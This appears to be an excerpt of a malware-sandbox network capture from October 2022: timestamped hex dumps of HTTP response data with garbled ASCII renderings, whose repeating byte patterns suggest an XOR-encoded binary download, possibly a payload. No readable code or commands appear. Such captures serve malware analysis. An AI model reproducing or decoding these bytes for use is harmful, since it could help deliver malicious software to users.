                                                                                                                                  2022-10-17 20:07:17 UTC897INData Raw: 77 03 20 dd 61 d7 30 f2 67 0c 26 26 77 03 20 9d 61 d7 30 f2 67 4c 26 26 77 03 20 5d 60 d7 30 f2 67 8c 27 26 77 03 20 1d 60 d7 30 f2 67 cc 27 26 77 03 20 dd 60 d7 30 f2 67 0c 27 26 77 03 20 9d 60 d7 30 f2 67 4c 27 26 77 03 20 5d 6f d7 30 f2 67 8c 28 26 77 03 20 1d 6f d7 30 f2 67 cc 28 26 77 03 20 dd 6f d7 30 f2 67 0c 28 26 77 03 20 9d 6f d7 30 f2 67 4c 28 26 77 03 20 5d 6e d7 30 f2 67 ec 29 26 77 03 20 3d 6e d7 30 f2 67 2c 29 26 77 03 20 fd 6e d7 30 f2 67 6c 29 26 77 03 20 bd 6e d7 30 f2 67 68 2a d6 77 03 20 3d 6c d7 30 f2 67 2c 2b 26 77 03 20 fd 6c d7 30 f2 67 6c 2b 26 77 03 20 bd 6c d7 30 f2 67 ac 2c 26 77 03 20 7d 6b d7 30 f2 67 ec 2c 26 77 03 20 dd 6b d7 30 f2 67 0c 2c 26 77 03 20 7d 6a d7 30 f2 67 ec 2d 26 77 03 20 3d 6a d7 30 f2 67 2c 2d 26 77 03 20
                                                                                                                                  Data Ascii: w a0g&&w a0gL&&w ]`0g'&w `0g'&w `0g'&w `0gL'&w ]o0g(&w o0g(&w o0g(&w o0gL(&w ]n0g)&w =n0g,)&w n0gl)&w n0gh*w =l0g,+&w l0gl+&w l0g,&w }k0g,&w k0g,&w }j0g-&w =j0g,-&w
                                                                                                                                  2022-10-17 20:07:17 UTC904INData Raw: 36 9c 04 65 43 ac 6f 02 24 d8 51 29 1e cf 71 2f 05 cd 49 14 19 c5 44 09 0e dc 55 0e 1e d6 55 60 4e 98 30 6c 47 9b 06 1f 42 9f 01 68 41 e9 01 64 47 e9 09 1f 34 ee 75 6f 4f 9d 00 6c 41 9b 01 6f 31 9e 74 6e 31 9c 02 19 44 ee 04 5d 36 95 71 1b 47 9b 02 1e 44 9c 00 6b 40 ef 00 19 36 9f 03 65 45 99 73 6c 4f ee 03 6f 33 98 72 1e 46 9c 08 1b 4f ea 72 69 77 e8 04 5d 4b 92 09 02 28 9c 6f 69 77 90 79 39 46 92 52 02 28 9c 6f 69 77 e8 6f 69 77 90 0e 2d 28 f3 04 5d 31 d9 5e 3e 17 98 30 3a 12 d8 6f 14 13 98 30 2e 12 d8 6f 14 13 98 30 18 19 d8 59 29 0e 98 30 14 a7 18 04 5d 32 ee 02 19 35 98 05 6b 32 9c 74 6a 40 95 75 68 45 94 74 6c 43 9b 04 1b 36 99 05 1c 34 95 09 6d 42 99 71 68 32 94 01 68 77 9f 08 1b 43 9f 01 1c 42 98 09 69 46 9d 71 18 35 9f 02 65 46 9c 00 6b 4f ed 04
                                                                                                                                  Data Ascii: 6eCo$Q)q/IDUU`N0lGBhAdG4uoOlAo1tn1D]6qGDk@6eEslOo3rFOriw]K(oiwy9FR(oiwoiw-(]1^>0:o0.o0Y)0]25k2tj@uhEtlC64mBqh2hwCBiFq5eFkO
                                                                                                                                  2022-10-17 20:07:17 UTC912INData Raw: 28 ed 45 29 1f c9 5e 29 1e cf 51 29 1e c3 5e 5d 2f 99 00 64 24 c9 42 2b 1e cf 55 1e 12 de 44 34 11 c5 53 3c 03 c9 71 28 03 c4 55 33 03 c5 53 3c 03 c5 5f 33 77 cb 55 29 28 e0 5f 3e 16 d8 59 32 19 ac 63 24 04 d8 55 30 59 e2 55 29 59 e2 55 29 00 c3 42 36 3e c2 56 32 05 c1 51 29 1e c3 5e 5d 22 c2 59 3e 16 df 44 14 27 ed 54 39 05 c9 43 2e 3e c2 56 32 05 c1 51 29 1e c3 5e 5d 30 cd 44 38 00 cd 49 14 27 ed 54 39 05 c9 43 2e 3e c2 56 32 05 c1 51 29 1e c3 5e 5d 22 c2 51 2f 0e e3 40 38 05 cd 44 34 18 c2 30 1f 1e c2 51 2f 0e e3 40 38 05 cd 44 34 18 c2 30 2d 04 d6 79 30 07 c0 55 30 12 c2 44 3c 03 c5 5f 33 77 ff 49 2e 03 c9 5d 73 30 c0 5f 3f 16 c0 59 27 16 d8 59 32 19 ac 63 24 04 d8 55 30 59 fe 45 33 03 c5 5d 38 59 ff 55 2f 1e cd 5c 34 0d cd 44 34 18 c2 30 0e 0e df 44
                                                                                                                                  Data Ascii: (E)^)Q)^]/d$B+UD4S<q(U3S<_3wU)(_>Y2c$U0YU)YU)B6>V2Q)^]"Y>D'T9C.>V2Q)^]0D8I'T9C.>V2Q)^]"Q/@8D40Q/@8D40-y0U0D<_3wI.]s0_?Y'Y2c$U0YE3]8YU/\4D40D
                                                                                                                                  2022-10-17 20:07:17 UTC920INData Raw: 77 d9 30 31 77 cd 30 2f 77 e9 30 25 77 dc 30 2f 77 c9 30 2e 77 df 30 34 77 c3 30 33 77 df 30 2f 77 c3 30 3e 77 c9 30 2e 77 df 30 7d 77 fb 30 0e 77 d5 30 2e 77 d8 30 38 77 c1 30 73 77 f8 30 38 77 d4 30 29 77 82 30 0f 77 c9 30 3a 77 d9 30 31 77 cd 30 2f 77 e9 30 25 77 dc 30 2f 77 c9 30 2e 77 df 30 34 77 c3 30 33 77 df 30 35 77 c9 30 2f 77 c9 30 7d 77 ff 30 38 77 df 30 2e 77 ff 30 24 77 df 30 29 77 c9 30 30 77 82 30 09 77 c9 30 25 77 d8 30 73 77 fe 30 38 77 cb 30 28 77 c0 30 3c 77 de 30 18 77 d4 30 2d 77 de 30 38 77 df 30 2e 77 c5 30 32 77 c2 30 2e 77 c5 30 32 77 c2 30 14 77 c8 30 60 77 8b 30 5c 4a ff 30 24 77 df 30 29 77 c9 30 30 77 82 30 09 77 c9 30 25 77 d8 30 73 77 fe 30 38 77 cb 30 28 77 c0 30 3c 77 de 30 18 77 d4 30 2d 77 de 30 38 77 df 30 2e 77 c5 30
                                                                                                                                  Data Ascii: w01w0/w0%w0/w0.w04w03w0/w0>w0.w0}w0w0.w08w0sw08w0)w0w0:w01w0/w0%w0/w0.w04w03w05w0/w0}w08w0.w0$w0)w00w0w0%w0sw08w0(w0<w0w0-w08w0.w02w0.w02w0w0`w0\J0$w0)w00w0w0%w0sw08w0(w0<w0w0-w08w0.w0
                                                                                                                                  2022-10-17 20:07:17 UTC928INData Raw: 16 c1 55 2a 18 de 5b 19 1e df 40 31 16 d5 7e 3c 1a c9 20 73 39 e9 64 7d 31 de 51 30 12 db 5f 2f 1c 8c 04 52 76 ac 31 5d 23 a2 34 13 16 c1 55 5e 3e c8 01 52 76 ac 31 5d 23 a2 34 13 16 c1 55 5e 3e c8 02 52 76 ac 31 5d 23 a2 34 13 16 c1 55 5e 3e c8 03 7b 76 ac 32 5d 23 a2 34 13 16 c1 55 5a 32 c2 44 34 03 d5 08 09 79 a5 7e 3c 1a c9 43 2d 16 cf 55 5b 32 c2 44 34 03 d5 16 5c 77 ae 30 09 79 a8 7e 3c 1a c9 37 18 19 d8 59 29 0e 95 64 53 7e e2 51 30 12 df 40 3c 14 c9 36 18 19 d8 59 29 0e 8b 31 5d 75 ac 64 53 73 e2 51 30 12 a4 75 33 03 c5 44 24 46 9c 64 53 7e e2 51 30 12 df 40 3c 14 c9 36 18 19 d8 59 29 0e 8b 31 5d 75 ac 64 53 73 e2 51 30 12 a4 75 33 03 c5 44 24 46 9d 64 53 7e e2 51 30 12 df 40 3c 14 c9 36 18 19 d8 59 29 0e 8b 31 5d 75 ac 64 53 73 e2 51 30 12 a4 75
                                                                                                                                  Data Ascii: U*[@1~< s9d}1Q0_/Rv1]#4U^>Rv1]#4U^>Rv1]#4U^>{v2]#4UZ2D4y~<C-U[2D4\w0y~<7Y)dS~Q0@<6Y)1]udSsQ0u3D$FdS~Q0@<6Y)1]udSsQ0u3D$FdS~Q0@<6Y)1]udSsQ0u
                                                                                                                                  2022-10-17 20:07:17 UTC936INData Raw: 79 25 7a 24 cc c7 5f da cb 15 36 ff 0c 63 a2 28 df 06 c1 f6 a3 5c 03 1b 24 05 41 a3 6f b1 ea 52 2d 5f 6b fd 99 ec 6b 03 db 6b e3 62 66 7d 07 a2 c3 c9 0d 14 77 e4 95 b9 33 f3 bd 22 83 7b 10 ba 0b 33 ed a5 2a 87 7b 2e 94 db e5 0b e3 42 bb 33 4a 8d 17 91 f0 34 ca 1d 96 a4 fa 86 aa 32 a2 1f 4b 0a 82 65 19 a4 b8 9a 17 7f c8 80 d7 f8 2a 3f b1 ef 78 80 06 23 97 9b d8 3e 60 23 c8 3c dd 4d b4 ea 72 23 90 dd 50 81 40 51 0c 67 09 af 32 ea 75 c1 a3 dd 25 0a 9a e4 4e cc c4 8a 57 8b 1f 59 25 72 b6 a6 39 2a b4 10 6f 5f 45 1c c3 49 a8 b6 56 ca 0c 55 7f fd 12 f2 39 35 7d c2 4b c7 0e f6 26 56 51 3f ba 30 24 dd 9e 10 9b 59 b3 60 df 1c f9 51 b6 aa cd de 84 06 c0 29 c1 a8 89 31 78 2a f6 10 db 5a b7 14 8f 2c a7 dc ad 81 db ad 30 64 0c 7d 33 5f 0e 3f 32 c3 cb 53 90 d6 56 8b fe
                                                                                                                                  Data Ascii: y%z$_6c(\$AoR-_kkkbf}w3"{3*{.B3J42Ke*?x#>`#<Mr#P@Qg2u%NWY%r9*o_EIVU95}K&VQ?0$Y`Q)1x*Z,0d}3_?2SV
                                                                                                                                  2022-10-17 20:07:17 UTC943INData Raw: 27 14 ad 89 06 cf 25 80 17 a5 ef 14 60 41 67 23 9a 69 0c 35 ec f2 b0 94 e4 7f 5a 46 77 90 ca ad ed a5 8f 5e 47 ad f0 e8 77 e2 30 25 64 6c ba 7a d0 c1 e6 a7 fe 42 18 14 74 94 35 fd c8 0b 8b e7 86 30 97 11 3a 64 5f ed 83 d0 e2 d0 10 11 59 2a 6f 34 e8 c6 22 9b 7f 13 ac 50 26 4f 4f 7d d7 db 73 4d b8 86 7e a9 f3 97 8d ff 49 5a 83 bb 9e bf ca 93 b0 29 8a e5 96 6b a2 45 1f fc 56 85 78 dd 79 d7 8e f6 f8 b3 36 07 44 02 97 25 1e 18 8a 87 27 be b3 23 cd d3 61 27 9e 95 8f ce 51 6c 44 5d 71 63 78 5d f0 30 3e 2b ed f8 fa e9 f7 92 49 72 87 f1 ad 62 96 cc 72 23 ea 99 b4 c8 32 43 bf 82 96 c4 57 5d 6b f9 68 18 f1 28 13 d4 87 8d d7 5f ad 51 ba ae 46 ca 8a 17 e5 44 cd a6 9b d3 3b f4 91 aa fe 78 70 f2 ee ed ad e0 32 47 4b 8f b9 35 ea 71 31 9a 52 09 4d 32 f6 a2 2f 0d 55 b2 ff
                                                                                                                                  Data Ascii: '%`Ag#i5ZFw^Gw0%dlzBt50:d_Y*o4"P&OO}sM~IZ)kEVxy6D%'#a'QlD]qcx]0>+Irbr#2CW]kh(_QFD;xp2GK5q1RM2/U
                                                                                                                                  2022-10-17 20:07:18 UTC951INData Raw: 88 5d 8c 45 88 5c 8c 4a 88 5c 8c 4a 88 5c 8c 4a 88 5c 8b 4b 88 5c 8b 4b 88 5c 8b 4b 88 5c 8b 4b 88 5c 8b 48 88 5c 8b 48 88 5c 8b 48 88 5c 8b 49 88 5c 8b 49 88 5c 8b 49 88 5c 8b 4e 88 5c 8b 4e 88 5c 8b 4e 88 26 43 73 88 e3 7a 62 88 e3 7a 62 88 e3 79 63 88 e3 79 63 88 e3 79 63 88 e2 79 63 58 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 e9 84 36 b7 e9 84 36 88 e9 84
                                                                                                                                  Data Ascii: ]E\J\J\J\K\K\K\K\H\H\H\I\I\I\N\N\N&CszbzbycycycycX0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w66
                                                                                                                                  2022-10-17 20:07:18 UTC959INData Raw: 88 ee 83 34 88 ee 83 34 49 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 f1 68 13 88 f1 68 13 88 f1 68 13 88 f1 68 10 88 f1 68 10 88 d6 5e 10 88 58 fc 12 88 58 fc 12 88 58 fc 12 88 58 fc 12 88 58 fc 13 88 58 fc 13 88 58 fc 13 88 58 fc 10 88 5f f6 64 88 5d 8f 7c 88 5d 8e 7d 88 5d 8e 7d 88 5d 8e 7d 88 5d 8e 42 88 5d 8e 42 88 5d 8e 42 88 5d 8e 43 88 5d 8e 43 88 5d 8e 43 88 5d 8d 40 88 5d 8d 40 88 5d 8d 40 88 5d 8d 41 88 5d 8d 41 88 5d 8d 41 88 5d 8d 46 88 5d 8d 46 88 5d 8d 46 88 5d 8d 46 88 5d 8d 47 88 5d 8d 47 88 5d 8d 47 88 5d 8c 44 88 5d 8c 44 88 5d 8c 44 88 5d 8c 45 88 5d 8c 45 88 5d 8c 45 88 5c 8c 4a 88 5c 8c 4a 88 5c 8c 4a 88 5c 8b 4b 88 5c 8b 4b 88 5c 8b 4b 88 5c 8b
                                                                                                                                  Data Ascii: 44I0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]whhhhh^XXXXXXXX_d]|]}]}]}]B]B]B]C]C]C]@]@]@]A]A]A]F]F]F]F]G]G]G]D]D]D]E]E]E\J\J\J\K\K\K\
                                                                                                                                  2022-10-17 20:07:18 UTC967INData Raw: 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 e5 86 33 a7 e4 85 33 88 e4 85 33 88 e4 85 33 88 e4 85 33 88 eb 85 30 d6 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 cc 6b 0d 88 cc 6b 0d 88 f3 6a
                                                                                                                                  Data Ascii: w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w3333300]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]wkkj
                                                                                                                                  2022-10-17 20:07:18 UTC975INData Raw: 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30
                                                                                                                                  Data Ascii: w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0
                                                                                                                                  2022-10-17 20:07:18 UTC982INData Raw: 88 24 40 77 88 24 5f 74 88 24 5f 74 88 2b 5f 74 88 2b 5f 75 88 2b 5f 75 88 2b 5f 75 88 2a 5f 7a 88 2a 5f 7a 88 2a 5e 7a 88 2a 5e 7b 88 2a 5e 7b 88 2a 5e 7b 88 2a 5d 78 88 2a 5d 78 88 29 5d 78 88 29 5d 78 88 2d 5a 7b 88 c1 6b 76 88 e5 73 69 88 ea 71 68 88 ea 71 68 88 ea 70 69 88 ea 70 69 88 ea 70 69 88 e9 0f 6e 88 e9 0f 6e 88 e9 0f 6e 39 ac 30 5d 77 f3 6a 12 73 cf 6e 09 a0 cf 6e 09 88 cf 6e 09 88 ce 6d 0e 88 ce 6d 0e 88 ce 6d 0e 88 cd 6c 0f 88 33 bc 0e 88 44 f4 09 88 58 fd 09 88 58 fd 09 88 58 fd 09 88 58 fd 0e 88 5f f8 1d 88 5e f1 75 88 5d f0 7a 88 5d f0 7a 88 5d f0 7a 88 5d f0 7b 88 5d f0 7b 88 5d f0 7b 88 5d f0 78 88 5d f0 78 88 5d f0 78 88 5d 8f 79 88 5d 8f 79 88 5d 8f 79 88 5d 8f 7e 88 5d 8f 7e 88 5d 8f 7e 88 5d 8f 7f 88 5d 8f 7f 88 5d 8f 7f 88 5d 8f
                                                                                                                                  Data Ascii: $@w$_t$_t+_t+_u+_u+_u*_z*_z*^z*^{*^{*^{*]x*]x)]x)]x-Z{kvsiqhqhpipipinnn90]wjsnnnmmml3DXXXX_^u]z]z]z]{]{]{]x]x]x]y]y]y]~]~]~]]]]
                                                                                                                                  2022-10-17 20:07:18 UTC990INData Raw: 88 5d 8e 43 88 3c 4a 64 88 f4 63 15 88 fb 62 15 88 fb 62 15 88 fb 62 15 88 fb 61 1a 88 fa 61 1b 47 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ff 7e 1e 58 f8 7e 1e 88 f8 7e 1e 88 f8 7e 1e 88 ff 7e 1e 88 ff 7e 1e 88 3c 4d 1e 88 5f f9 18 88 5f f9 18 88 5f f9 18 88 5f f9 19 88 5f f9 19 88 5f f9 19 88 5f f9 1e 88 5f f9 1e 88 5d f0 78 88 5c 8b 4e 88 5c 8b 4e 88 5c 8b 4e 88 5c 8a 4f 88 5c 8a 4f 88 5c 8a 4f 88 5c 8a 4c 88 5c 8a 4c 88 5c 8a 4c 88 5c 8a 4c 88 5c 8a 4d 88 5c 8a 4d 88 5c 8a 4d 88 5c 89 52 88 5c 89 52 88 5c 89 52 88 5c 89 53 88 5c 89 53 88 5c 89 53 88 5c 89 50 88 5c 89 50 88 5c 89 50 88 5c 88 51 88 5c 88 51 88 5c 88 51 88 5c 88 56 88 5c 88 56 88 5c 88 56 88 5c 88 57 88 5c 88
                                                                                                                                  Data Ascii: ]C<JdcbbbaaG0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w~X~~~~~<M________]x\N\N\N\O\O\O\L\L\L\L\M\M\M\R\R\R\S\S\S\P\P\P\Q\Q\Q\V\V\V\W\
                                                                                                                                  2022-10-17 20:07:18 UTC998INData Raw: 88 ca 51 0a 88 ca 51 0a 88 2d 46 0a 88 58 ff 04 88 58 ff 04 88 58 ff 04 88 58 ff 05 88 58 ff 05 88 58 ff 05 88 58 fe 0a 88 58 fe 0a 88 58 fd 0e 88 5e f2 71 88 5e f2 71 88 5e f2 71 88 5e f1 76 88 5e f1 76 88 5e f1 76 88 5e f1 77 88 5e f1 77 88 5e f1 77 88 5e f1 74 88 5e f1 74 88 5e f1 74 88 5e f1 75 88 5e f1 75 88 5e f1 75 88 5d f0 7a 88 5d f0 7a 88 5d f0 7a 88 5d f0 7a 88 5d f0 7b 88 5d f0 7b 88 5d f0 7b 88 5d f0 78 88 5d f0 78 88 5d f0 78 88 5d 8f 79 88 5d 8f 79 88 5d 8f 79 88 5d 8f 7e 88 5d 8f 7e 88 5d 8f 7e 88 5d 8f 7f 88 5d 8f 7f 88 5d 8f 7f 88 5d 8f 7c 88 5d 8f 7c 88 5d 8f 7c 88 3e 4b 66 88 f6 64 17 88 f6 64 17 88 f5 64 14 88 f5 64 14 88 f5 64 14 88 f4 63 15 47 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30
                                                                                                                                  Data Ascii: QQ-FXXXXXXXXX^q^q^q^v^v^v^w^w^w^t^t^t^u^u^u]z]z]z]z]{]{]{]x]x]x]y]y]y]~]~]~]]]]|]|]|>KfdddddcG0]w0]w0]w0]w0]w0]w0]w0
                                                                                                                                  2022-10-17 20:07:18 UTC1006INData Raw: 88 df 56 19 88 de 56 1e 88 de 56 1e 88 de 56 1e 88 de 55 1e 88 de 55 1e 88 de 55 1e 88 dd 55 1f 88 dd 55 1f 88 dd 55 1f 88 dd 54 1c 88 dd 54 1c 88 dd 54 1c 88 dc 53 1d 88 dc 53 1d 88 dc 53 1d 88 c3 53 1d 88 c3 53 62 88 c3 53 62 88 c3 52 62 88 c2 52 62 88 c2 52 62 88 c2 52 62 88 c2 51 63 88 c2 51 63 88 c2 51 63 88 c1 50 60 88 c1 50 60 88 c1 50 60 88 c1 6f 61 88 c1 6f 61 88 c1 6f 61 88 c0 6f 66 88 c5 6d 66 88 fa 7f 66 88 e0 76 66 88 e0 76 66 88 e0 76 66 88 e7 75 67 88 e7 75 67 88 e7 75 67 88 e7 75 67 88 e6 74 64 89 e6 74 64 40 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 cb 52 05 08 c4 53 04 88 cb 52 04 88 cb 52 04 88 cb 52 04 88 ca 51 05 88 ca 51 05 88 ca 51 05 88 ca 51 0a 88 ca 51 0a 88 ca 51 0a 88 c9 50 0b 88 c9 50 0b 88 c9 50 0b 88 c8 6f 08 88 c8 6f 08 88 c8 6f
                                                                                                                                  Data Ascii: VVVVUUUUUUTTTSSSSSbSbRbRbRbRbQcQcQcP`P`P`oaoaoaofmffvfvfvfugugugugtdtd@0]w0]w0]wRSRRRQQQQQQPPPooo
                                                                                                                                  2022-10-17 20:07:18 UTC1014INData Raw: 88 5c 8c 4a 88 5c 8b 4b 88 5c 8b 4b 88 5c 8b 48 88 5c 8b 48 88 c2 50 65 88 fc 7b 62 88 fc 7b 62 88 e3 79 63 6f ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ea 85 30 88 ea 84 31 88 e9 84 36 9f ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 f1 68 13 88 f1 68 10 88 c7 53 10 88 58 fc 12 88 58 fc 13 88 58 fc 13 88 58 fc 10 88 5e f2 70 88 5d 8e 7d 88 5d 8e 42 88 5d 8e 43 88 5d 8e 43 88 5d 8d 40 88 5d 8d 40 88 5d 8d 41 88 5d 8d 46 88 5d 8d 46 88 5d 8d 47 88 5d 8c 44 88 5d 8c 44 88 5d 8c
                                                                                                                                  Data Ascii: \J\K\K\H\HPe{b{byco0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0160]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]whhSXXXX^p]}]B]C]C]@]@]A]F]F]G]D]D]
                                                                                                                                  2022-10-17 20:07:18 UTC1022INData Raw: 88 dd 55 1f 88 5f f9 19 88 5f f9 19 88 5f f9 1e 88 5f f9 1e 88 5d 8d 41 88 5c 8a 4f 88 5c 8a 4f 88 5c 8a 4c 88 5c 8a 4d 88 5c 8a 4d 88 5c 89 52 88 5c 89 53 88 5c 89 53 88 5c 89 50 88 5c 88 51 88 5c 88 51 88 5c 88 56 88 5c 88 56 88 5c 88 57 88 5c 88 54 88 5c 88 54 88 5c 87 55 88 43 87 5a 88 fa 7c 6c 88 ea 71 68 88 ea 70 69 88 c8 6f 08 88 c8 6f 08 88 dd 59 08 88 58 fe 0b 88 58 fe 0b 88 58 fe 08 88 58 fe 08 88 5f f5 6b 88 5e f1 74 88 5e f1 75 88 5e f1 75 88 5d f0 7a 88 5d f0 7b 88 5d f0 7b 88 5d f0 78 88 5d f0 78 88 5d 8f 79 88 5d 8f 7e 88 5d 8f 7e 88 5d 8f 7f 88 5d 8f 7c 88 5d 8f 7c 88 5d 8e 7d 88 5d 8e 42 88 5d 8e 42 88 5d 8e 43 88 d8 56 1d 88 fb 62 15 88 fb 61 1a 88 fa 61 1b 6f ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ff 7e 1e 6f f8 7e 1e 88 ff 7e
                                                                                                                                  Data Ascii: U____]A\O\O\L\M\M\R\S\S\P\Q\Q\V\V\W\T\T\UCZ|lqhpiooYXXXX_k^t^u^u]z]{]{]x]x]y]~]~]]|]|]}]B]B]CVbaao0]w0]w0]w0]w~o~~
                                                                                                                                  2022-10-17 20:07:18 UTC1029INData Raw: 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 e6 86 32 4c e6 86 32 86 e5 86 32 88 e5 86 33 88 e4 85 33 88 eb 85 30 88 ea 85 30 88 ea 85 30 88 ea 84 31 88 e9 84 36 88 e8 84 36 88 ef 84 37 88 ef 83 37 8e ef 83 37 15 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 f2 69 12 88 f1 68 13 88 75 87 12 88 58 fc 12 88 58 fc 13 88 5e f5 6b 88 5d 8f 7c 88 5d 8e 7d 88 5d 8e 42 88 5d 8e 43 88 5d 8d 40 88 5d 8d 41 88 5d 8d 46 88 5d 8d 46 88 5d 8d 47 88 5d 8c 44 88 5d 8c 45 88 5c 8c 4a 88 5c 8b 4b 88 1b a3 78 88 fe 7c 1c 88 fd 7b 1d a6 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 eb 85 30 88 ea 85 30 88 ea 85
                                                                                                                                  Data Ascii: w0]w0]w0]w0]w0]w0]w0]w2L22330001667770]w0]w0]w0]wihuXX^k]|]}]B]C]@]A]F]F]G]D]E\J\Kx|{0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w00
                                                                                                                                  2022-10-17 20:07:18 UTC1037INData Raw: 88 5d 8c 45 88 5c 8b 4b 88 5c 8b 48 88 5c 8b 49 88 f2 65 66 88 e3 79 63 fc ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 e9 84 36 88 e8 84 36 03 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 f1 68 10 88 03 a7 10 88 58 fc 10 88 5f f6 60 88 5d 8e 42 88 5d 8d 40 88 5d 8d 41 88 5d 8d 46 88 5d 8d 47 88 5d 8c 45 88 5c 8c 4a 88 5c 8b 4b 88 5c 8b 49 88 f3 65 66 88 e3 7a 62 fc ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ea 84 31 88 e9 84 36 03 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 